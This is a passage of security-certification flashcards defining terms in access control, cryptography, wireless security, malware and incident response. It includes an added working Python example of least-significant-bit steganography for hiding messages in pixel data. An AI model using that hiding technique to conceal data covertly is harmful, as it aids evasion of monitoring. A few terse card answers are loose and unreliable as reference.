make source code difficult to read without changing its functionality. Steganography

Architecture/design weaknesses (7)

make sure locks on all doors on the network like: Ingress. VPN. Third-party access. Internal controls. Account access. Front door access. Conference room access

credential management (2)

make sure credentials are stored only on the server (hashed), never in the client or in the code. audit to make sure the authentication exchange is encrypted.

how can you secure log files on a web server?

make sure they're enabled: can monitor, access and view all files.

Principles of social engineering: Trust

make you feel safe to give info to

Obfuscation

making something more difficult to understand

Adware (2)

malware that displays advertisements to the user, commonly in a web browser. May cause performance issues over the network.

External threats

man-made threats from outside the organisation.

Memory management

management of memory so that buffer boundaries are respected and it cannot be exploited (e.g. buffer overflows).

Role examples for Role-based access control

manager, director, team lead, project manager, etc

data custodian (3)

manages the access rights to the data. implements the security controls defined by the data owner. is sometimes the same person as the data steward

Identification of an incident concerns (2)

many detection sources with different levels of detail and perception. which are legit threats?

Competitors (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

many motives: DoS, espionage, harming reputation, competitive advantage (unethical). high level of sophistication. significant funding. intents: DoS during an event, steal customer lists, corrupt manufacturing databases, take financial info

Proper error handling security concerns (2)

may allow bad guys to find and take advantage of vulnerabilities. default messages can give info on how application was created or the platform its running on.

Where may AUP be documented?

may be documented in an employee's Rules and Behavior

organization log policies (2)

may need formal process to collect and archive log info. may fall under privacy laws

Captive portal security (2)

may require additional authentication factors. can remove access after certain amount of time or on logout.

Adverse action requirement

may require extensive documentation.

In most organisations, Elasticity is integrated with what?

may require orchestration to automate this process e.g. scaling up and down during different times of day.

Hash aka

message digest (aka)

RIPEMD (2)

message digest developed under the European RACE project on Integrated Broadband Communications. RIPEMD-160 performs similarly to SHA-1

NAT uses (2)

minimizes IPv4 address shortages. Hides internal addressing, which is security through obscurity rather than a real security control.

What secure configurations should be added to OS user accounts? (2)

minimum password lengths and complexity. Limit capabilities to just what they need.

Investing in security is what type of risk response technique?

mitigate (example)

Grey box

mix of black and white box pentest. Some details given to pentesting team. Up to them to gather additional details

hybrid cloud deployment model

mix of public and private cloud

Mobile Device External media

mobile phones can connect to computers acting as mobile storage devices.

DNS poisoning (2)

modifying the DNS server's records to send users to incorrect sites. Can also be done by modifying the client's hosts file.

SLE

monetary loss of a single event.

Strategic Intelligence (2)

more data that is collected and stored, the easier it is to create a strategy for future protection. make policy changes and process changes based on data gathered.

Impact: Life

most important goal is to make sure everyone is safe.

WPA2 history (3)

most modern encryption for wireless network introduced in 2004. AES replaced RC4. CCMP replaced TKIP.

Personnel issues: Social media security

most organisations have a policy controlling this; often a centralized function around a marketing team.

Geolocation security (2)

most phones can disable this function. MDM can require it enabled to track all company assets.

password history (2)

most systems should be set to remember previous passwords used. best to keep passwords unique.

Detective examples (2)

motion detector. IDS/IPS (control example)

random number generation input examples (3)

mouse movements, atmospheric noise, lava lamps

SoC

multiple components and most of the processing running on a single chip with some supporting devices like interfaces surrounding the chip.

Failover security

must be documented in both directions, including the revert back to primary location.

SSID (2 eg) and security (2)

name of the wireless network broadcast by the AP, e.g. "Netgear", "default". Best to change defaults so they don't describe the manufacturer. Some disable SSID broadcasting, but this is not a security feature since the SSID can still be determined from a packet capture.

IoT Home automation

nearly all devices can be connected to wifi at home.

Key escrow security (3)

need clear process and procedures for managing keys. need to be able to trust your 3rd-party and their security. May have carefully controlled conditions to gain access to keys.

SLA examples (2)

network access from a 3rd party may require: a certain uptime. a response time and management of any problems.

Nmap (4)

network mapper- learn more about the network devices across network. port scan: find devices and identify open ports. OS scan: finds what OS is on a device without logging into the device. service scan:name, version, details. (Nmap scripting engine (NSE): extend capabilities, vulnerability scans)

SCADA/ICS (2)

network that centrally controls large pieces of equipment in real time. often used in manufacturing or power distribution.

DMZ

network zone where public has access to public resources but not the internal network

Memory management security concerns (3)

never trust data input. buffer overflows. some built-in function in a programming language are insecure

ABAC is often referred to

next generation of authorization

Dissolvable agents (3)

no installation required. runs during the posture assessment e.g. authentication process. Terminates and removed from device when no longer required

3DES uses

deprecated; replaced by AES.

Immutable system security (2)

no incremental updates over time, so no configuration drift that introduces new security issues. Can redeploy complete previous iterations.

Self-signed advantages (2)

no need to purchase trust for devices that already trust you. provides trust within an organization.

Single point of failure security and concerns

no practical way to remove them all. Invest in the right systems in the right place in the organisation to keep it running as much as possible.

Non-regulatory (3)

no rule or law for compliance, just best practices. law may be in the works. may create value for yourself or others

Password complexity (4)

no single words. no obvious passwords. (dog's name) mix upper and lower case. use special characters but don't replace o with 0 or t with 7.

Qualitative loss (1,eg)

non-monetary business impact e.g. lost laptop can mean lost time for employee to work and provide services to customers.

Qualitative risk assessment (3)

non-monetary business impact. ask opinions about the significance. Display visually with traffic light grid, scale of one to ten, etc.

LDAPS

nonstandard implementation of LDAP over SSL

security issues with 3rd-party apps (2)

not all apps secure: vulnerabilities, data leakage

Air gaps security concerns

if removable media is not disabled, someone can physically walk data between the networks.

Something you are disadvantages

not foolproof

biometrics security (2)

not the most secure authentication factor. MDM can enable/disable this function

Resource exhaustion (2)

occurs when the resources required to execute an action are entirely expended, preventing that action from occurring. The most common outcome is DoS.

SSL Accelerators

offloads the SSL handshake off of web servers.

SSL Accelerator (2)

offloads the SSL handshake process, which uses asymmetric encryption, from the web servers to this hardware. Encryption may terminate here, with traffic continuing to the web servers in the clear over HTTP.

Stream cipher security

often combined with an IV, since we often send duplicate information and reusing the same key stream would produce repeated ciphertext.

Special purpose embedded devices: Medical devices security concerns

often use older OS

NTLM

old Windows authentication method using a domain name, user name and password hash

places to keep a public key

on a public key server available to everyone usually retrieved with an email address.

places HOTP used

on hardware or software tokens

omnidirectional antenna (2)

one of the most common antenna types that distributes signal evenly on all sides. No ability to focus the signal

MDM (3)

one pane of glass to remotely manage all mobile devices. Sets policies, create partitions, force screen locks and PINs

Split knowledge example

one person has half of a safe combination and some one else has the other

Application Whitelisting: Path

only allows application in certain folders to run

Application Whitelisting: Network zone

only allows applications to run from a particular zone or IP address scheme for a network.

Application Whitelisting: Certificate (eg)

only allows digitally signed application from certain publishers. e.g. only allow applications developed by Microsoft by only allowing a particular signed certificate.

Application Whitelisting: Application hash

only applications that match a hash can execute

Email certificates advantages

only receiver can decrypt contents of email with their private keys. digitally signing provides non-repudiation and integrity for emails.

OpenPGP (3)

open standard. RFC 4880. Implemented as software called GPG

Shibboleth

open-source software that implements SAML to provide federated SSO.

Mirai botnet (3)

malware whose source code was published openly. Takes advantage of default credentials to take over IoT devices. Tries 60+ default username/password combinations.

Private cloud deployment model

organization creates and hosts private clouds with local data center available internally.

data retention (2)

organization decide how much data is kept around for how long and how often its kept. may have legal requirements like storing certain data and how its stored (e.g. encrypted)

COPE security (3)

organization keeps full control of the device. usually managed from MDM. Information is protected by policies and can be deleted at any time

Password expiration

organizations can require passwords to be changed every 90, 60, 30 or in critical systems 15 days.

security concerns with the original 802.11 management frames

original frames unprotected with no encryption, authentication or validation and thus vulnerable to disassociation attacks

RIPEMD issues

original had collisions discovered in 2004.

SMS/MMS security concerns (2 + eg)

outbound data leaks, financial disclosures, inbound notifications, phishing attempts

Firmware OTA updates (2)

over the air updates for mobile device OS. can be simple security patches or entire OS updates.

Open proxy security concern

owner of these proxies can add malicious code to responses.

Linux iptables

packet filter in the kernel.

ISM band

unlicensed frequency ranges reserved for Industrial, Scientific, and Medical use; the 2.4 GHz band used by Wi-Fi is one of them.

what standard is USB OTG?

a supplement to the USB 2.0 standard

Federation authentication process (3)

password and account info is not shared: authentication process is passed to third-party. third-party validates authentication and provides the clearance back to the original site.

Reason password management is challenging on shared accounts (2)

password changes must be communicated to everyone who shares the password. Constant password changes leave yellow sticky-note paper trails.

credential management concerns (2)

passwords must not be embedded in the application or stored on the client. Authentication traffic should not be seen.

TOTP (2)

passwords on tokens created with a secret key and the current time. Token and server clocks are kept in sync (e.g. with NTP); the time step is typically 30 seconds.

HOTP (2)

passwords on tokens used once for a session or authentication attempt and never again. Created with a secret key and an incrementing counter.

NFC implementations (3)

payment systems. Bootstrap for other wireless. Identity system

places to keep a private key

personal key should be kept private.

Spear phishing

phishing customized for targeting specific groups or individuals.

example of software tokens

phone can have software based tokens or just SMS message for additional authentication.

places Fingerprint scanner is used

phones, laptops, door access

Hardware root of trust

physical hardware designed to be difficult to circumvent since code can't change it and security functions do not work without it.

Air gaps

physically separate network with no way to have devices communicate with each other.

antenna placement

place APs so the signal covers all points, with adjacent APs on different, non-overlapping channels.

Containerization

placing all company data in a virtual contained area separate and inaccessible from personal data.

other places for firewalls

placing between users and data in data center.

change management process (6)

plan for a change. estimate the risk associated with the change. have recovery plan ready. test before making change. document, get approval and schedule. make change.

Single point of failure

points like outages or downtime to a particular service

PKI (4)

policies, procedures, hardware, software, and people used to manage digital certificates. encapsulates the process of creating, distributing, managing, storing and revoking certificates. Also refers to the binding of public keys to people or devices. Its based on trust created by a CA.

clean desk policy (3 ie)

policy that when you leave your desk, nothing is on top of your desk i.e. paperwork, turned on computer, any seen data.

Captive portal (2)

pop up on a browser asking for username and password for network access. Access table that recognizes a lack of authentication redirects user to this page.

port mirrors aka (2)

port redirection. SPAN (Switched Port ANalyzer)

Background checks aka

pre-employment screening

Background checks (3)

pre-employment screening that allows you to: verify the applicant's claims. Discover criminal history. Discover workers' compensation claims, which show injuries and illnesses the worker filed that affect the job.

MTBF

predicted time between two failures

Hash (2)

represents data as a short fixed-length string. Computationally infeasible to recover the original message, i.e. a one-way trip.

Impersonation (4)

pretend to be someone else. can be in person or over the phone. Gather information to become familiar with the organization. can try using higher rank, becoming familiar, throw technical details around

Shimming

pretending to be software-based middleman to get around security.

Pinning security (2)

prevents MITM. if certificates don't match, application can shutdown or show an error message.

How does DLP manage content for mobile devices? (3)

prevents copy/paste of sensitive data. ensures data is encrypted. can set policies from a MDM

DLP (3 eg)

prevents loss of sensitive data: social, credit card #, medical records, etc

Advantage of Nonce

prevents replays during logins since a new number would be used each time.

DAP

X.500 Directory Access Protocol, the predecessor of LDAP, which ran on the OSI protocol stack.

Screen filters aka

privacy filters (aka)

Intranet

private company network used by employees with internal or VPN access.

Improperly configured accounts (2)

process issue where accounts may be: abandoned and unnecessary, no longer needed. given unneeded administrative access. best practice should prevent admin login accounts unless on a server console.

Asset management (5)

process, usually automated to Identify and track computing assets. allows faster response to security problems. keep an eye on the most valuable assets: both hardware and data. Track licenses and make sure they are updated. keep all devices up to date (patches, antimalware signatures)

Organized crime threat actors (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

Professionals motivated by money. Almost always external. Very sophisticated: the best hacking money can buy. Organized: one hacks, one manages exploits, one sells data, one does customer support, etc.

honeypot options

projecthoneypot.org/, honeyd

certificate of destruction

proof by a 3rd party that they destroyed your media and data.

Fighting Race conditions

proper checks and validation must be performed

Physical safe security (2)

protect against elements: fire, water. have contingency for lost keys/combinations

Protected distribution (4)

protected fiber and copper with conduits often made of sealed metal. Prevents copper and fiber taps. prevents cutting wires. Periodic visual inspection.

server-side validation security

protects against malicious input submitted outside the user interface, e.g. a crafted request that bypasses client-side checks.

Backup utilities protects against (4 eg)

protects from downtime, malware, ransomware, server defacement, etc.

Why is Host-based firewalls required for laptops and mobile devices?

protects on unfamiliar and open networks.

LDAP

protocol for reading and writing directories over an IP network.

LDAP (ie)

protocol for reading and writing directories over an IP network. i.e. it organizes large numbers of services into structured databases.

OpenID (and what it combines with)

protocol that provides SSO authentication. Usually combines with OAuth for authorization between applications

OAuth

protocol that provides resource authorization

External storage devices security

provide encryption in case loss or stolen

Importance of physical signs

provides clear and specific instructions e.g. for visitors.

netstat OS?

provides different views for what the statistics are for network communications on a particular device, available for many OS

GCM advantages (3)

provides encryption and authentication at the same time. minimum latency. minimum operation overhead

Provisioning

providing or making something available usually involves adding many other things to make something fully operational

Application proxy (3)

proxies that understand how applications operate. they proxy whole applications on user's behalf. Might understand one application like HTTP or many applications

Public key certificate

public key combined with a digital signature for added trust.

when was MD5 published?

published 1992

Year Diffie-Hellman was published

published in 1976

RSA publication history (3)

published in 1977. First practical public key cryptosystem. The patent expired in 2000, so it is now in the public domain.

Network Infrastructure Devices OS

purpose built embedded OS with limited, non-detailed user access.

Secure cabinets/enclosures (2)

put racks side by side and locked. provide ventilation.

EMI/EMP security (1) and where its found (3)

put shielding in place. military installations. places that deal with national security. highly secure networks

Fighting Privilege Escalation (4)

quickly patch and update software. Update anti-virus/anti-malware since they can stop some known vulnerabilities even if system isn't patched. DEP will not allow vulnerabilities in non-executable areas to run. ASLR would prevent bad guys from focusing on specific memory addresses

DAP

ran on the OSI protocol stack. (was replaced by a more lightweight LDAP that uses TCP/IP)

Built-in Features on a TPM (6)

random number generator. key generator. persistent memory with unique burned-in keys. versatile memory for storing keys and hardware configurations. password protected. Protected against Dictionary Attacks

Nonce number examples (3)

random or pseudo-random number. can be a counter

clear text

readable data transmitted or stored "in the clear" (unencrypted)

low-severity vulnerability

real vulnerability identified but most often not a high priority.

Normalization

refers to organizing the tables and columns to reduce redundant data and improve overall database performance.

Gramm-Leach-Bliley Act (GLBA)

regulation of disclosure of privacy info from financial institutions. i.e. requires financial institutions to provide consumers with a privacy notice explaining what information they collect and how that information is used.

NT LAN Manager v2 (NTLM) challenge/response (3)

relatively insecure MD4 password hash. HMAC-MD5 hash of username and server name. Variable-length challenge that uses timestamp, random data, and Windows domain name

NFC security concerns (5)

remote capture within 10 meters. Frequency jamming. relay/replay attack, MITM. loss of device can be used

purging

remove data partly or completely from a device

dead code security

remove dead code to reduce opportunities for security problems.

Eradication (3)

remove malware. Disable breached user accounts. Fix the vulnerabilities that were exploited.

Advantages of Secure token

removes overhead from servers. easier to scale then server-based authentication.

Fighting adware

removing adware may be hampered by the adware itself, as it displays ads for fake removal software that may install more adware.

MD5

replaced MD4. 128-bit hash value

Wireless Replay attack

replays packets captured over the air.

802.1X (2) prevents what?

requires authentication for everyone who wants to use resources on the network (NAC). Helps prevent rogue access points.

Capturing IV (4)

required to crack a WEP password. requires thousands. could take all day capturing it over the air or can be collected by replaying a ton of ARPs. Capturing takes time. crack is fast.

Mandatory vacations

requirement to go on vacation a certain number of times or amount of time during the year

Full tunnel

requires all traffic run to a VPN concentrator before it can access 3rd party websites

Off-site backups security (2)

requires extensive protection, usually mandated by compliance requirements.

Perfect forward secrecy concerns

requires more computing power. legacy systems and browsers can't communicate over encrypted channel to servers that support this.

Rooting/Jailbreaking process

replaces or modifies the device's firmware/OS with a custom image that grants root (administrative) access to the OS.

Requirements for Federation

requires trust between organizations.

Advanced Malware Tools best practice (2)

research best anti-malware and recovery tools possible. better to stop and prevent infection

Cryptanalysis real world use

researchers are constantly trying to find weaknesses in ciphers.

In-band response

response from Inline IPS to drop immediately any malicious identified traffic

Privacy officer (2)

responsible for all the organization's data privacy. sets policies, implements processes and procedures

Recovery (3)

restore from good backups. or rebuild from scratch. large-scale rebuilding may take months and have phases.

Host-based firewall (2)

restricts access to device. prevents programs on device from accessing network

Impact: Property

risk to buildings and assets

what are Network scanners good at finding?

rogue systems

Job rotation

rotating employees to different jobs and responsibilities in an organization.

examples of systems RADIUS can authenticate to (6)

routers, switches, firewalls. server authentication. remote VPN access. 802.1X network access

Backup utilities (3)

rsync: incremental file synchronization. Regular partial backups: hourly incremental backups. Full backups: files, system images.

Script kiddies (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

Runs pre-made scripts to find vulnerabilities without much knowledge of what's happening. Usually external. Not very sophisticated. No formal funding. Motivated by ego, the hunt.

php is what kind of code?

runtime code (example)

SATCOM

satellite communication from remote locations and natural disaster sites

WinDump file format

saved in pcap format can be loaded in a protocol analyzer later

tcpdump file format

saved in pcap format so it can be loaded in a protocol analyzer later

credentialed scan

scan that uses a legitimate username and password, so the scanner sees the system as an authenticated user would and is not limited by the existing security controls.

Identify vulnerability

scanners looks through a well defined list of known vulnerabilities based on what it sees in that system.

Iris scanner

scans texture or color of the eye

Retinal scanner

scans the unique capillary structure in the back of the eye

Fighting Rogue access point (2)

schedule a periodic survey. Use some 3rd party tool like WiFi Pineapple. Configure 802.1X (NAC)

full device encryption

scrambles all data to protect content even if the device is lost or stolen

Security through obscurity examples (5)

secrecy of design. Substitution ciphers, e.g. ROT13. SSID broadcast suppression. MAC filtering.

Development environment

secure environment where code can be written and moved to a sandbox for additional testing.

Extranet

secure private network where trusted 3rd parties authenticate to have access to certain resources but not the internal network

Key management life cycle: storage

securely store and protect against unauthorized use

Administrative controls examples (2)

security policies. Standard operating procedures (control example)

Steganography

security through obscurity that hides a message inside another file, commonly an image.

Digital camera security concerns (2)

seen as a removable storage device when plugged into a computer over USB, so the same removable media concerns apply. Firmware can be compromised.

Physical Segmentation (2)

segmentation of networks using separate physical devices. Need a switch or router to connect them

Segmentation aka (2)

segregation, isolation

Cross-site request forgery example

send transfer request to a bank when clicking a link to send money to the bad guy.

PAP authentication process

send username and password to PAP server. If it matches you gain access

Vaulting

send your backup media to an outside storage facility

dynamic analysis

sending random or malformed input into a running application (fuzzing) to see what it does.

SYN Flood (4)

sends a large number of SYN requests (the first step in creating a new TCP connection). The attacker ignores the SYN-ACK sent back from the server, never completes the handshake, and simply sends another SYN. The goal is to overload the server with a huge number of half-open TCP connections so it cannot respond to valid traffic from normal users. Results in a DoS.

Wireless keyboard and mice security concerns (3)

sends data using proprietary protocol to computer unencrypted. data can be captured similarly to keyloggers. Inject keystrokes and mouses movements to control computer remotely.

Bluejacking (4)

sends unsolicited messages to mobile devices. Can be delivered as an address book entry: "Hi, world! Add to contacts?" 10 meter range. Largely mitigated on updated devices and rarely occurs today.

How effective is an Out-of-band response? (2)

sent after the fact, so the malicious traffic may not be fully stopped. UDP has no reset, so this mode can only send a TCP RST for TCP sessions.

Mutual authentication trust model

server and client both trust each other's certificates.

good place to implement Lockout and why?

service accounts, to prevent brute force attacks.

Ephemeral key example

session key (example of)

Automated Courses of Action (2)

set of automated responses to problems that were predicted. common in cloud-based infrastructure maintenance.

Secure baseline of a deploying application (5)

set of baselines defining exactly how the application should perform: Firewall settings, patch levels, OS file versions. may require constant updates

Things MDM can set policies for? (3)

set policies on applications, data, camera, etc

carrier unlocking security

set policies on what people are able to do with mobile devices and carriers

Least Privilege on Accounts

set rights and permissions on user accounts to the bare minimum of what they need.

Group policy Security control (4 eg)

set rules in the OS: can limit minimum or maximum password lengths. require smart card to authenticate. maximum security log size. Enforce user login restrictions

Community cloud deployment model

several organization share the same resources over a cloud

File integrity check for windows

sfc

Password recovery

should not be a trivial process since this is a good opportunity for social engineering

Hash concerns

should not have collisions.

Large-scale recovery (1, 2 eg,1, 2 eg)

should start with quick, high-value security changes. e.g. patches, firewall changes. Later phases involve "heavy lifting" and take more time e.g. Infrastructure changes and large-scale security roll-outs.

ifconfig (2)

shows IP, MAC, network adapter info, etc. Linux interface configuration.

ipconfig (2)

shows IP, MAC, network adapter info, etc. Windows TCP configuration

Screen filters

shows whats on the screen to only the person right in front of the monitor.

Pentest (vs vulnerability reason to?)

simulate an attack against a device. different from vulnerability scanning in that it tries to exploit the vulnerabilities. could be compliance mandate done regularly by 3rd party

VDI updates

since application are managed centrally no need to update all mobile devices.

NTP vulnerabilities

since it has no built-in security features, it is exploited as an amplifier in DDoS attacks.

Application servers

sits in the middle of web servers and databases that provides programming languages, runtime libraries, etc.

Brute force attack Online (2)

slow process. after multiple login attempts process may slow down or lockout

RFID (3)

small chips for tracking. RF powers tag and ID is transmitted back. Some tags are always on

DES concerns

small key makes it easy to brute force today

CAC card

smart card used by the US Department of Defense. Has a picture, identification information and a certificate.

PIV card

smart card used by the US Federal Government. has a picture, identification information and certificate.

User certificates examples (2)

smart cards, digital access cards on a device or computer.

where is Infrared used? (3)

smartphones, tablets, smartwatches to control entertainment center.

examples of where Version Control is found. (4)

software development. OS. wiki software. cloud-based file storage

GPG (2)

software that implements the OpenPGP open standard. Compatible with commercial PGP.

Antivirus

software that runs in OS that looks for viruses trying to download and execute.

Stress testing

software that simulates one to thousands of users to see what results of the application reaching its limit.

port mirrors (2)

software-based tap that is built-in to network switches that can send copies of traffic to an analysis tool. limited functionality.

Replay attack vs cryptography (2)

some protocols are more susceptible if there is no salt, no session ID tracking, no encryption. Some have countermeasures: Kerberos uses timestamps and discards anything past its TTL.

Legal issue with data destruction

some data cannot be destroyed and may have to be stored offsite instead.

Impact: Safety

some environments are too dangerous to work

Track man-hours (and expenses) (3)

some incidents can use massive resources all at once or over long period. be as accurate as possible. may be required for restitution in a legal environment.

Wireless keyboard and mice security

some manufacturers implement AES encryption to protect from wireless capture and injection.

Role-based awareness training: Systems administrator

some one who enables the use of the applications and data.

How to fight ransomware and Crypto-malware (4)

some ransomware can be fake and removed without harming data. Crypto-malware needs a key that only the bad guy has and payment methods are untraceable. This can be recovered from using offline backups. Also update antivirus/malware, OS and applications.

Key escrow

someone else holds your decryption keys i.e. private keys are in the hands of a 3rd-party.

executive user (2)

someone responsible for the overall use of the application. Evaluates goals and makes decisions for future use of data.

System owner (3)

someone who makes decisions about the overall operation of the application and data. defines security policies and backup policies. manages changes and updates

Role-based awareness training: User (2)

someone who uses applications day to day. has the least privileged access to the application

Privileged user

someone with additional application and data permissions.

Insiders (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

Internal. Sophistication may not be advanced, but has institutional knowledge: understands the network and hardware locations and may have access to many of those systems. Extensive resources, since they work there.

Runtime code (3)

source code is viewable. code instructions execute when app is run. no way to check for errors before app is run.

Advanced Malware Tools

specialized removal and recovery tools for systems already infected.

How to embed and read text from an image

specialized steganography software
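The Steganography card and this one describe hiding text inside an image; the most common technique is least-significant-bit (LSB) embedding, where each bit of the message overwrites the low bit of one pixel byte. The block below is an added example (not from the original deck or any steganography tool) that embeds and extracts a message over a constructed byte array standing in for grayscale pixel data, using only the standard library. The 32-bit length prefix is an assumed framing convention.

```python
def embed(cover: bytes, message: bytes) -> bytes:
    """Hide `message` in the least-significant bit of each cover byte.
    Layout (assumed): 32-bit big-endian length prefix, then message bytes, MSB first."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(b >> (7 - i)) & 1 for b in payload for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small: need %d bytes, have %d" % (len(bits), len(cover)))
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit       # clear the low bit, then set it to the message bit
    return bytes(out)


def _read_bytes(stego: bytes, start_bit: int, n: int) -> bytes:
    """Reassemble n bytes from the low bits of stego[start_bit:]."""
    vals = bytearray()
    for k in range(n):
        v = 0
        for i in range(8):
            v = (v << 1) | (stego[start_bit + k * 8 + i] & 1)
        vals.append(v)
    return bytes(vals)


def extract(stego: bytes) -> bytes:
    """Recover the message: read the length prefix, then that many bytes."""
    length = int.from_bytes(_read_bytes(stego, 0, 4), "big")
    return _read_bytes(stego, 32, length)


def max_pixel_change(cover: bytes, stego: bytes) -> int:
    """LSB embedding changes each byte by at most 1, which is why it is visually invisible."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed cover: a 1024-byte grayscale ramp standing in for real pixel data.
COVER = bytes(range(256)) * 4
SECRET_MESSAGE = b"meet at dawn"

if __name__ == "__main__":
    stego = embed(COVER, SECRET_MESSAGE)
    print("recovered:", extract(stego))
    print("largest per-pixel change:", max_pixel_change(COVER, stego))
```

Nothing here depends on a key: anyone who knows (or guesses) the layout extracts the message, which is exactly why the deck files steganography under security through obscurity. For confidentiality, encrypt the message before embedding it.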

Active Reconnaissance (5)

stage of pentest where locating open doors to your target without trying to exploit them. Usually done with vulnerability scan. ping scans, port scans. DNS queries. OS scans, use OS fingerprinting. service scans, version scans

Syslog

standard method for message logging across diverse systems to send to a central logging receiver usually on a SIEM

X.500

the directory services standard that LDAP is based on, which allows LDAP to work with different OSes and technologies.

HIPS/HIDS implementation old and new

started as a separate application. Now integrated into anti-virus or anti-malware suites ("endpoint" products)

Most firewalls these days are this type.

stateful firewall

Type of authentication, Token based authentication uses.

stateless authentication

where is the OCSP status stored and stapled? (2)

status info is stored on the certificate holder's server. It is "stapled" into the SSL/TLS handshake.

Where TACACS+ is used

still used primarily with Cisco systems, but an open standard is available to connect into Cisco infrastructure.

places air gaps are used (4)

stock market networks. Power systems/SCADA. On airplanes. Nuclear power plant operations

Ways antivirus software stops viruses (3)

stop downloads. prevent execution. prevent visit of a known bad URL

Risk avoidance

stop participating in high-risk activity

External storage devices

storage outside the computer that's very portable and convenient for moving large files.

WORM (2)

storage that can't be changed, good for storing long term data like SIEM logs (e.g. DVD-R)

Third-party app stores (2)

stores that allow installation of apps outside the official app store. May not have the security vetting of a central app clearinghouse.

RC4 (3)

stream cipher. part of WEP standard, Part of SSL but removed from TLS.

(Backup) Location Selection (2)

subject to different legal implications and data sovereignty

Caesar cipher

substitution cipher where every letter is substituted with another letter a fixed number of positions away.

Time synchronization for SIEM (2)

synchronizing all clocks on all network devices to compare time stamps of events. can use NTP.

high availability

systems are always available and always on at any time.

Malicious Ways to DoS (3 eg)

take advantage of a design failure or vulnerability. Being hit by too much traffic. turning off the power to a building

Stored procedures

take long SQL requests and store them on the database. invoke them with a CALL command and the procedure name

SASL (2 eg)

takes existing protocols like LDAP and provides authentication using many different methods e.g. Kerberos or client certificate, etc.

what port does LDAP run on?

tcp/udp 389

Cable locks

temporary security for laptops that connects a cable to a standard reinforced notch connector found on most laptops. the cable can be tied down, e.g. to the leg of a table.

Ping (3)

test availability, round-trip time. uses ICMP. one of your primary troubleshooting tools

Workstation OS

the OS type used by users at their desks.

Failover

the act of moving business process to a recovery site.

dissemination

the action or fact of spreading something, especially information, widely.

non-repudiation

the assurance that someone cannot deny the validity of something.

platform

the basic hardware (computer) and software (operating system) on which software applications can be run.

Templates (2)

the basic structure of an application instance, configured with a web server and database server, certificates, etc. requires more configuration specific to the application instance, which can be automated as well.

Data-in-use

the data in the memory.

fighting cross-site request forgeries (2)

the developer should make sure the application validates users properly. the application should have anti-forgery techniques added, like a cryptographic token and encryption.

Differential Backup Recovery process

restore the full backup and the differential backup.

Alternate processing sites

the disaster recovery sites that business processes failover to until the primary location recovers.

confusion (2)

the encrypted data is drastically different from the plaintext. no discernible patterns to recognize the plaintext.

Improper error handling (5 eg)

error messages that are not properly modified by the developer and tend to display too much detail: network information. memory dumps. stack traces. database dumps

MTTF

the expected lifetime of a non-repairable product or system

the pivot

the foothold point into a network; once set up, it's easy to move through the network since security inside is limited

Mission-essential functions

the functions of the organization that should take priority in restoring during recovery, e.g. after a hurricane.

Key strength

the larger the keys are, the harder they are to brute force

False acceptance rate (FAR)

the likelihood that an unauthorized user will gain access with biometrics that don't belong to them.

CRL (2)

the list of revoked certificates. maintained by the CA.

RTO (2)

the maximum amount of time it can take to restore a system after an outage. must be back to a particular service level

Password cracker (4)

the means to try to crack a hash of a password. It involves first somehow obtaining the password hash files. No salt or a weak hash is easy to brute-force. Rainbow tables can be used if these hashes were previously brute-forced (cloud, John the Ripper, Ophcrack)

asset value

the monetary cost of an asset.

Application Whitelisting (2)

the practice of allowing only specifically named applications on an OS. Often built into the OS management

Steganography (2)

the practice of concealing a file, message, image, or video within another file, message, image, or video. Also data in other data e.g. data in TCP packets.

Tarpitting

the practice of slowing the transmission of e-mail messages sent in bulk as a means of thwarting spammers

SSL offload

the process an SSL accelerator uses to offload the asymmetric SSL handshake from the web server.

OS fingerprinting

the process of determining the operating system used by a host on a network without having to authenticate to the system

Supply chain

the process of getting a product or service from the supplier to the customer.

Patch management

the process of regularly applying patches to software for system stability and security fixes.

Root certificate (3)

the public key certificate that identifies the root CA. It is used to issue other certificates. should be highly secured

Impact: Finance

the resulting financial cost during an incident

Principles of social engineering: Scarcity (2)

the situation will not be this way for long. adds a timer to resolving the fake problem.

Exploiting Vulnerabilities (2) (and reasons to be careful: 3)

the stage after recon where you try to take advantage of exploits. the ultimate test of security. can cause DoS and data loss during production hours. Buffer overflows can cause instability. can gain privilege escalation

Version Control

the tracking of changes that lets you revert to a previous version

RTOS security concerns

nothing should be embedded into these that could prevent them from being always available.

Printers/MFD

these days printers can have scanners, fax, network connections, local storage, etc.

On-boarding IT agreements

things to be signed when bringing in a new person, like the employee handbook or a separate AUP.

Hoaxes

threats that don't actually exist and tend to waste time or deceive to take money.

CHAP authentication process

three-way handshake: client sends username to server. server sends a challenge message. client responds with a password hash calculated from the challenge and the password. server compares the received hash with the stored hash.

USB OTG security and concern

too convenient. can disable with MDM

ECB use

too simple for most use cases

static code analyzer (2)

tool to find security vulnerabilities in source code. gives options for alternative code.

Split tunnel

traffic going to the corporate network runs through a tunnel while all other traffic runs its normal routes.

cellular security concerns (3)

traffic monitoring. location tracking. worldwide access to a mobile device

loop (2)

traffic sent between 2 switches connected together will go back and forth forever, since there is no counting mechanism at the MAC layer. brings the network down fast

Incident response team

trained response team that deals with security incidents

Platform as a service security

trained security professionals manage the security and controls of the data in the cloud

Elasticity

trait of cloud that lets you add new resources and scale down as needed.

Man-in-the-browser (3)

trojans or malware act as a proxy on the computer, sitting between the browser and the computer, to send traffic to the bad guy. Traffic is unencrypted on the computer. They can replay traffic of bank logins later.

How is communication trusted between sites (3)

a trusted CA signs the web server's encryption certificate, which the web site paid for. the CA validated identity before signing: DNS record, phone call, etc. the user's browser checks the signature and compares it to its list of trusted CAs

TPM

trusted hardware on a motherboard in charge of supporting cryptographic functions.

Dual control examples (2)

two keys open a safe, each held by a different person. Or two keys to launch a missile.

Collision

two messages having the exact same hash.

Asymmetric algorithm (4)

two or more mathematically related keys: a private key, and a public key which is seen by everyone. Only the private key can decrypt what the public key encrypted.

Kiosk OS

type of OS found in public devices and tightly locked down.

Appliance OS (2)

type of OS that is purpose-built and minimal. often unseen by the user.

brandjacking

type of URL hijacking where a brand name associated with a URL is claimed by malicious users.

deterrent

type of control that discourages an intrusion attempt.

public data

unclassified data with no restrictions on viewing

some results of stress testing (3)

